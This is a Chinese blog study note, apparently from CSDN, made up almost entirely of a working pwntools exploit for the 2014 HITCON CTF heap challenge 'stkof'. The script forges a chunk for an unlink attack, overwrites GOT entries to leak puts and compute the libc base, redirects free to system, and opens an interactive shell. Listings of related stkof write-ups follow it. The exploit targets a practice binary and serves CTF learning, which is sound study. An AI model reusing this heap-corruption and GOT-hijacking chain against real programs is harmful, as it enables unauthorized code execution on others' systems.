stkof

最新推荐文章于 2024-05-31 14:19:09 发布
最新推荐文章于 2024-05-31 14:19:09 发布
阅读量189 收藏
点赞数
分类专栏: 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pppp974/article/details/100928395
版权 
from pwn import *
p= process("./stkof")
libc = ELF("./libc.so.6")
elf = ELF("./stkof")

def create(size):
	p.sendline('1')
	p.sendline(str(size))
	p.recvuntil('OK\n')

def edit(index,size,content):
	p.sendline('2')
	p.sendline(str(index))
	p.sendline(str(size))
	p.sendline(content)
	p.recvuntil('OK\n')

def free(index):
	p.sendline('3')
	p.sendline(str(index))
address=0x602140
create(0x100)
create(0x30)
create(0x80)
payload=p64(0)+p64(0x20)+p64(address+16-0x18)+p64(address+16-0x10)+p64(0x20)
payload=payload.ljust(0x30,'a')
payload+=p64(0x30)+p64(0x90)

edit(2,len(payload),payload)
free(3)
p.recvuntil('OK\n')
payload1='a'*8+p64(elf.got['free'])+p64(elf.got['puts'])+p64(elf.got['atoi'])
edit(2,len(payload1),payload1)
edit(0,len(p64(elf.plt['puts'])),p64(elf.plt['puts']))
free(1)
puts_addr = p.recvuntil('\nOK\n',drop=True).ljust(8, '\x00')
puts_addr = u64(puts_addr)
libc_base=puts_addr-libc.symbols['puts']
system_addr=libc_base+libc.symbols['system']
binsh=libc_base+next(libc.search('/bin/sh'))
log.success('puts addr: ' + hex(puts_addr))
log.success('libc base: ' + hex(libc_base))
log.success('/bin/sh addr: ' + hex(binsh))
log.success('system addr: ' + hex(system_addr))
payload=p64(system_addr)
edit(2,len(payload),payload)
p.sendline(p64(binsh))
p.interactive()

难受,好不容易写出来结果发现网上说Ubuntu18测试不了

gone too soon
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Pwn_Heap_Stkof
m0_56897090的博客
08-17 131
Stkof 文章目录Stkof题目描述题目原理Exp 题目描述 同[[堆]]类型的题目 基础的堆题目(创建、释放、修改) 特征:带有off by one在写堆数据时 题目原理 利用unlink的套路,合并伪造size标志位使堆块提前向上合并 将堆控制权提到系统数据可控制区域 伪造fake_chunk填充got地址使得程序内部libc基地址泄露 Getshell OneGadget,修改GOT指向的地址为OneGadget地址 劫持Free 劫持atoi Exp Exp使用了3种方法 one_g
unlink 2014 HITCON stkof
qq_36918532的博客
01-17 2552
题目可以从buuctf下载 参考链接有两篇:一篇使我们的靶场里面的内网服务器的文章链接就不贴了:他所使用的原理是通过atoi函数来达到获取shell的,另外一篇通过free-》system https://blog.csdn.net/Pwnpanda/article/details/81369367 首先拿到题目,随便输入发现没有任何提示,,,,在IDA里面仔细看了看,大概看出来 1.用来分配 2用来写入内容 3.用来free 4.好像没什么用 而且发现在输入的时候是没有验证大小的,可以随便输入所以就可以
Leecode---买卖股票最大利润问题
最新发布
qq_41920323的博客
05-31 268
贪心算法实现买卖股票问题
HITCON 2014 pwn - stkof 做题笔记
fa1c4的blog
08-30 446
前言 一道unlink + off-by-one, ctfhub 搜 stkof 分析过程 __int64 __fastcall main(int a1, char **a2, char **a3) { int v3; // eax int v5; // [rsp+Ch] [rbp-74h] char nptr[104]; // [rsp+10h] [rbp-70h] BYREF unsigned __int64 v7; // [rsp+78h] [rbp-8h] v7 = __re
hitcon2014_stkof
m0_73756460的博客
02-22 156
buu刷题hitcon2014_stkof【wp】
2014_hitcon_stkof
m0_57754423的博客
02-10 1334
题目是wiki上的一道题目,对应的知识是unlink,也是因为一些事情很久没有学pwn了,下面简单分析一下这道题目。 漏洞是在编辑chunk的功能里存在的: 可以任意大小的向chunk里输入内容。 我们已知存储chunk数组的地址,同时可以修改next_chunk的 pre_size位和size位,可以采用unlink。 unlink的核心思想就是,通过相关的检查,将一个chunk从一个chun的链表中取出,然后与其地址相邻的free状态的chunk进行合并。 本题的利用思路就是: 通过编
buuctf pwn hitcon2014_stkof 初识unlink
weixin_45677731的博客
08-02 681
最近开始学堆,看了wiki和一些大佬的文章搞懂了这个有关unlink的题目:hitcon2014_stkof 首先拖进ida,看看几个主要的函数: 函数1,创建对,同时可以看到,堆的地址被存储在了s处,进去看看 发现是bss段,像这样的指针,就是这类题目的一个特征 函数2,编辑堆内容,长度可以自己设置,有堆溢出漏洞 函数3,free堆 函数4用处不大 先把三个函数写好: def alloc(size): sh.sendline('1') sh.sendline(str(size))
2014 HITCON stkof writeup
Morphy_Amo的博客
01-24 2059
文章目录writeup 题目链接 1、查看安全策略 root@kali:~/ctf/Other/pwn/heap# checksec stkof [*] '/root/ctf/Other/pwn/heap/stkof' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 可以看
unlink小结 && 2014_hitcon_stkof
Pwnpanda的博客
08-02 1344
暑假学习计划 - 0x02 关于unlink的学习资料以及本例题的wp都很多,本篇主要是做个小总结,内附较为详细的调试图片以便初学者理解 (自从入了堆坑学unlink,到现在差不多一个半月了,真的是死去活来,也怪自己的基础差,现在算是理解一些了,先记下来等以后深入理解后再补充,在此感谢各位师傅的帮助,尤其是kaka师傅) 先放基础学习链接: Linux堆溢出漏洞利用之unlink http...
hitcon2014_stkof(unsorted bin unlink)
seaaseesa的博客
04-09 813
hitcon2014_stkof 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,edit功能存在溢出。 程序没有show功能。 由于没有开启PIE,got表也可以修改,因此,我们利用unlink控制堆指针为got表,然后修改strlen的got表为puts的plt表,即可实现show的功能,进而泄露glibc地址,后续利用。 #coding:utf8 from ...
CTF-pwn 2014-stkof writeup
Vicl1fe的博客
09-18 351
题目链接:Github 参考链接:传送门 堆的一些基础这里就不再介绍了,网上有很多,也可以加qq群一起讨论:946220807 准备开始正文 读懂题目 拿到题目,开启我们的IDA查看伪代码。运行程序并没有使用帮助,只能自己慢慢琢磨了。 可以看到输入不同的数字对应不同的函数(ida不同函数名可能也不同),共4个函数: fill() :这个函数用来向分配的空间填充数据。 free_chunk()...
2014_hitcon_stkof学习
a2590035252的博客
08-29 940
适用于和我一样的广大pwn菜鸡
[BUUOJ刷题记录]hitcon2014_stkof 一道Unlink例题
zylxixixi的博客
10-01 297
check一下开启的安全防护,并没有开启PIE 拿到题进行IDA反编译,可以看到有四个函数,对应四种操作,逐个分析。 allocate函数创建一个自定义大小的堆 edit函数自定大小修改堆块的内容,容易产生堆溢出 delete函数就是free堆块 还有一个没有意义的函数 这里比较重要的是存储堆块地址的数组地址 整体思路为: 申请四个堆块,大小分别为0x1000,0x90,0x80,0x10 一般来说题目会使用setbuf来关闭缓冲区,但由于本题并没有采用s...
writeup hitcon-ctf-2014/stkof
fuchuangbob的专栏
06-12 2168
writeup hitcon-ctf-2014/stkof题目: https://github.com/ctfs/write-ups-2014/tree/master/hitcon-ctf-2014/stkof 漏洞分析可参考: http://acez.re/ctf-writeup-hitcon-ctf-2014-stkof-or-modern-heap-overflow/ 使用pwntoo
hitcon_2014_stkof详解
像初雪一样自由洒落
04-20 1629
本文主要列出hitcon2014_stkof的详细过程 主要参考:unlink 系列 程序流程 allocate:分配一个指定size大小的块,返回idx。 其中块的指针信息保存在一个全局变量0x602140中 fill:根据idx找到对应的块,重新给定大小size,读入内容content free:释放idx的块 漏洞分析 由于fill时候的size可以重新制定,可以造成堆溢出。 没有打印函数 有一个全局变量 方法:unlink unlink,控制全局变量内容 修改chunk1指.
2014 HITCON CTF stkof
Bill
03-16 2887
2014 HITCON CTF stkof 1.序言 接着how2heap的教程走,下面是unlink漏洞的利用及相关练习。 有关漏洞的原理,网上已经有很多说明了,在这里我给出一些比较靠谱一的链接: CTF WiKi 堆溢出之unlink的利用-Yun Unlink Exploit Linux堆溢出漏洞利用之unlink 堆溢出的unlink利用方法 2.程序分析 ...
LeetCode刷题顺序(新手入门)
falldeep的算法世界
11-06 4040
移动零给定一个数组nums,编写一个函数将所有0移动到数组的末尾,同时保持非零元素的相对顺序。请注意,必须在不复制数组的情况下原地对数组进行操作。难就是不复制原数组要原地修改,解法为设置一个res,记录前面的0的个数,每次插入时只要插入到nums[i - res]中即可移除元素给你一个数组 nums 和一个值 val,你需要 原地 移除所有数值等于 val 的元素,并返回移除后数组的新长度。不要使用额外的数组空间,你必须仅使用 O(1) 额外空间并 原地 修改输入数组。
LeeCode——回溯法、动态规划、贪心法、分治法(快速说明)
Pan_peter的博客
05-30 1720
1. 可以搜索整个解空间,找到最优解。2. 不需要预先知道问题的解可能在哪里。1. 时间复杂度高,因为需要遍历整个解空间。2. 需要较大的空间存储搜索轨迹。1. 剪枝优化。2. 双向搜索。1. 重复计算较少,效率高。2. 可以通过将问题划分为多个子问题来简化问题。1. 需要存储中间结果,占用空间较大。2. 不能很好地处理某些非最优子结构的问题。1. 记忆化搜索。2. 状态压缩。1. 算法简单,易于实现。2. 通常时间效率较高。1. 得到的不一定是最优解,很难证明其正确性。
leetCode题型总结
逆流而上Mr李
08-25 3422
本文选取了LeetCode和剑指offer中的经典面试题,供大家进行参考 LeetCode leetcode 总计176道题,下面根据对应目录一一对应。 二分查找 位运算 分治算法 动态规划 双指针 哈希表 图 字符串 排序 搜索 数学 数组+矩阵 栈和队列 树 贪心算法 链表 一、二分查找 * [1. X的平方差](#1-求开方) * [2. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值